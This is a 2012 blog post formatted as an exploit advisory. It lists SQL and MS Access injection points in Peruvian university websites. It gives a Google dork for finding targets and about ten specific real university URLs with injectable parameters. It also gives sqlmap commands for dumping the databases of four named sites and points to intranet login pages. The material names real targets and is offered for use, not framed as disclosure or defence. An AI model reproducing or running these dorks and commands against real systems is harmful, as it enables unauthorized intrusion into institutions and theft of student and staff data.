lunes, 17 de diciembre de 2012

Peruvian Universities - MS Access/SQL Injection Vulnerabilities



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# Exploit Title : Peruvian Universities - MS Access/SQL Injection Vulnerabilities
# Date : 16-12-2012
# Author        : Caleb Bucker (Independent Security Researcher)
# Contact       : https://twitter.com/CalebDrugs
# Website : www.calebbucker.blogspot.com
# Category : WebApps
# Google Dork : ".php?id= site:edu.pe" or ".asp?id= site:edu.pe"
# Tested on:    : BackTrack 5 R3
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] ANALIZING:

# http://www.site-web.edu.pe/[PATH].php?id='     [SQL Injection]
# http://www.site-web.edu.pe/[PATH].asp?id='     [MS Access Injection]
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] DETECTING VULNERABILITY:

# You have an error in your SQL syntax;             [SQL Injection]
# Microsoft OLE DB Provider for SQL Server error '80040e14'  [MS Access Injection]
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] VULNERABLE FILES:

# noticias.php? detalle.asp? index.php? interno.php?
# informacion.php? egresados.php? contacto.php? encuesta.asp?
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] EXAMPLE SITES VULNERABLE:

# http://www.uap.edu.pe/convenios/detalle.asp?cod=1'
# http://www.umch.edu.pe/interno.php?id=46'
# http://www.utp.edu.pe/noticias.aspx?idNoti=1'
# http://www.ipp.edu.pe/listado.php?cat=1'
# http://www.udch.edu.pe/web/egresados.php?e=1'
# http://www.cientifica.edu.pe/noticias/noticias.asp?id=1327'
# http://www1.up.edu.pe/servicios/sitios/contacto.php?id=3'
# http://www.sistemasuni.edu.pe/encuesta/encuesta.asp?id_encuesta=372&pregunta=1'
# http://envivo.universia.edu.pe/detalle_empleo.php?id=8608'
# http://www.pucp.edu.pe/content/pagina14.php?pIDSeccionWeb=6&pID=915'
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] EXPLOITING SITES VULNERABLE WITH SQLMAP:

# ./sqlmap.py -u http://www.uap.edu.pe/convenios/detalle.asp?cod=1 --dbs
# ./sqlmap.py -u http://www.cientifica.edu.pe/noticias/noticias.asp?id=1327 --dbs
# ./sqlmap.py -u "http://www.sistemasuni.edu.pe/encuesta/encuesta.asp?id_encuesta=372&pregunta=1" -p "pregunta" --dbs
# ./sqlmap.py -u "http://www.pucp.edu.pe/content/pagina14.php?pIDSeccionWeb=6&pID=915" -p "pID" --dbs
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] SCREENSHOT:

# http://img213.imageshack.us/img213/269/inject.png
# http://img109.imageshack.us/img109/8761/inject2.png
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

[~] ACCESS INTRANET - LOGIN:

# http://www.site-web.edu.pe/intranet/
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

# Greet'z | @Pwnakil | @CLsecurity2011 & All my friend

More Info: http://packetstormsecurity.org/files/118888/Peruvian-Universities-SQL-Injection.html

1 comentario:

  1. me sorprende la vulnerabilidad de la pucp y sistema uni..

    ResponderEliminar